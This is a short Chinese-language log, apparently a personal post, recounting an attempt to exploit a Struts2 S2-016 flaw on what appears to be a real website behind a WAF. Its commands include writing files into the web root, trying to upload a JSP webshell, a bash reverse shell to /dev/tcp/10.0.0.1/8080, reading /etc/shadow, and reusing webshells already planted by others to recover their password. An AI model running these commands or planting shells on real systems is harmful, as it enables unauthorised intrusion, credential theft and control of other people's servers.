有个站存在st2-016用网上公布的payload尝试执行命令网站直接连接重置(貌似有waf),在首页找到个图片得到物流路径/xxxx/image/xxxx/logo.png
find /data/ -name logo.png
/data/app/jboss-web-2.1.9.GA/webapps/ROOT/xxxx/image/xxxx/
得到绝对路径,尝试echo "123" > /data/app/jboss-web-2.1.9.GA/webapps/ROOT/xxxx/image/xxxx/123.txt
可以写入给了我希望,可是尝试echo一个jsp一句话进行却访问空白
抓包发现404,我tm以为是马子的问题又上传了另外一个还是404.换了个后缀为jspx还是没得。
这个时候又想起wget http://127.0.0.1/1231.jsp >/data/xxxx/xxxx/xxx/image/1.jsp
发现还是404.
wget http://127.0.0.1/1231.jsp >/data/xxxx/xxxx/xxx/image/1.txt
又改为了txt发现还是没得准备先写入txt再重命名还是不行。
======================================================
准备直接bash反弹个shell过来。
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
失败~~~~
===========================================================
cat /etc/shadow发现是sha-025啥子加密没解密成功
==========================================================
这个时候我又怀疑是不是目录不解析jsp的原因,find /data -name *.jsp
我了靠这不是马场么.one.jsp各种jsp
尝试访问了几个都是空白.找到个不是空白的直接cat 查看密码得到密码为xxx
===========================================================================
心累